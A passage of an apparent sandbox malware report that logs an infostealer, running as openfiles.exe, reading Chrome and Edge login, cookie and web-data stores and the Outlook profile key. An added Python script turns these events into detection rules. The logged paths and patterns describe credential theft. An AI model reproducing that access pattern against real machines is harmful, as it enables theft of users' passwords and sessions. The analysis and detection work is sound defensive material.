Source: Yara match File source: 0000000C.00000002.2265395528.0000000021930000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000010.00000002.2754713283.00000000043B0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000011.00000002.2753361689.0000000003280000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000011.00000002.2752855309.0000000003000000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: C:\Windows\SysWOW64\openfiles.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local State Jump to behavior
Source: C:\Windows\SysWOW64\openfiles.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data Jump to behavior
Source: C:\Windows\SysWOW64\openfiles.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies Jump to behavior
Source: C:\Windows\SysWOW64\openfiles.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Local State Jump to behavior
Source: C:\Windows\SysWOW64\openfiles.exe File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Cookies Jump to behavior
Source: C:\Windows\SysWOW64\openfiles.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data Jump to behavior
Source: C:\Windows\SysWOW64\openfiles.exe File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data Jump to behavior
Source: C:\Windows\SysWOW64\openfiles.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Cookies Jump to behavior
Source: C:\Windows\SysWOW64\openfiles.exe Key opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\ Jump to behavior
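The process-creation entries earlier on this page (wscript.exe starting PowerShell, PowerShell starting the Windows Mail binary wab.exe, openfiles.exe starting Firefox) and the file and registry accesses listed in this section are the behaviours a detection engineer would turn into rules: a script host spawning a shell, a shell spawning an injection host, a browser launched by a parent that never launches browsers, a non-browser process reading Chromium `Login Data`, `Cookies`, `Web Data` or `Local State`, and a non-mail-client process opening the Outlook profile key. The Python below is an added example written for this page, not Joe Sandbox, Sigma or vendor logic; the rule identifiers, the `(kind, actor, target)` event format and the launcher allow-list are my own assumptions, the event list is transcribed from the report entries (the parent path for openfiles.exe is reproduced exactly as the sandbox recorded it), and the benign baseline is constructed for contrast.

```python
import ntpath
from typing import Iterable

# Image names used by the rules; all comparisons are on the lower-cased basename.
SCRIPT_HOSTS = {"wscript.exe", "cscript.exe", "mshta.exe"}
SHELLS = {"powershell.exe", "pwsh.exe", "cmd.exe"}
BROWSERS = {"chrome.exe", "msedge.exe", "firefox.exe"}
# Parents that legitimately start a browser; tune per environment (assumption).
BROWSER_LAUNCHERS = BROWSERS | {"explorer.exe", "userinit.exe", "svchost.exe"}
# Windows Mail binaries this sample uses as injection hosts.
MAIL_HOSTS = {"wab.exe", "wabmig.exe"}
MAIL_CLIENTS = {"outlook.exe"}
# Chromium credential and cookie stores, matched as suffixes under "User Data".
SECRET_STORES = ("login data", "cookies", "web data", "local state")
MAIL_PROFILE_KEY = "\\windows messaging subsystem\\profiles\\"


def image(path: str) -> str:
    """Lower-cased basename of a Windows path (ntpath works on any OS)."""
    return ntpath.basename(path).lower()


def triage(events: Iterable[tuple[str, str, str]]) -> list[tuple[str, str]]:
    """Run the five rules over (kind, actor, target) events, where kind is
    "process" (parent image, child image), "file" (process, file opened) or
    "registry" (process, key opened). Returns (rule_id, message) in event order."""
    hits: list[tuple[str, str]] = []
    for kind, actor, target in events:
        a = image(actor)
        if kind == "process":
            c = image(target)
            if a in SCRIPT_HOSTS and c in SHELLS:
                hits.append(("R1_script_host_shell", f"{a} started {c}"))
            if a in SHELLS and c in MAIL_HOSTS:
                hits.append(("R2_shell_to_mail_host", f"{a} started {c} (likely injection host)"))
            if c in BROWSERS and a not in BROWSER_LAUNCHERS:
                hits.append(("R3_browser_odd_parent", f"{c} started by {a}"))
        elif kind == "file":
            low = target.lower()
            if "\\user data\\" in low and low.endswith(SECRET_STORES) and a not in BROWSERS:
                hits.append(("R4_credstore_read", f"{a} opened {ntpath.basename(target)}"))
        elif kind == "registry":
            if MAIL_PROFILE_KEY in target.lower() and a not in MAIL_CLIENTS:
                hits.append(("R5_mail_profile_key", f"{a} opened Outlook profile key"))
    return hits


def verdict(hits: list[tuple[str, str]]) -> str:
    """Collapse rule hits into one line: tree anomaly plus store access is the
    infostealer pattern; either alone still deserves a look."""
    ids = {r for r, _ in hits}
    tree = ids & {"R1_script_host_shell", "R2_shell_to_mail_host", "R3_browser_odd_parent"}
    steal = ids & {"R4_credstore_read", "R5_mail_profile_key"}
    if tree and steal:
        return "infostealer chain: suspicious process tree plus credential-store access"
    if steal:
        return "credential-store access by a non-browser process"
    if tree:
        return "suspicious process tree"
    return "nothing flagged"


# Events transcribed from this report's entries.
REPORT_EVENTS = [
    ("process", r"C:\Windows\System32\wscript.exe",
     r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"),
    ("process", r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     r"C:\Windows\System32\cmd.exe"),
    ("process", r"C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe",
     r"C:\Program Files (x86)\Windows Mail\wab.exe"),
    ("process", r"C:\Program Files (x86)\fmIyHTjwiiTPdTeNNnFlBdZytaJkWZcwFAkyAxIOv\NJeXDhPqkKUqTApfiOc.exe",
     r"C:\Windows\SysWOW64\openfiles.exe"),
    ("process", r"C:\Windows\SysWOW64\openfiles.exe",
     r"C:\Program Files\Mozilla Firefox\firefox.exe"),
    ("file", r"C:\Windows\SysWOW64\openfiles.exe",
     r"C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data"),
    ("file", r"C:\Windows\SysWOW64\openfiles.exe",
     r"C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Cookies"),
    ("registry", r"C:\Windows\SysWOW64\openfiles.exe",
     r"HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook"),
]
# Constructed benign baseline: the same stores touched by their own owners.
BENIGN_EVENTS = [
    ("process", r"C:\Windows\explorer.exe", r"C:\Program Files\Mozilla Firefox\firefox.exe"),
    ("file", r"C:\Program Files\Google\Chrome\Application\chrome.exe",
     r"C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data"),
    ("registry", r"C:\Program Files\Microsoft Office\root\Office16\OUTLOOK.EXE",
     r"HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook"),
]

if __name__ == "__main__":
    for rule, msg in triage(REPORT_EVENTS):
        print(f"{rule:24} {msg}")
    print(verdict(triage(REPORT_EVENTS)))
```

The rules key on image basenames only, which is what a sandbox report gives you; in production telemetry add the signer and the on-disk path of the parent, since a parent reported under a random directory beneath `Program Files (x86)` is itself worth a rule once you can verify whether that file exists.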

Remote Access Functionality

Source: Yara match File source: 00000011.00000002.2753491610.00000000032F0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000C.00000002.2249406825.00000000026D0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000012.00000002.2755502958.0000000002150000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000C.00000002.2265395528.0000000021930000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000010.00000002.2754713283.00000000043B0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000011.00000002.2753361689.0000000003280000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000011.00000002.2752855309.0000000003000000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY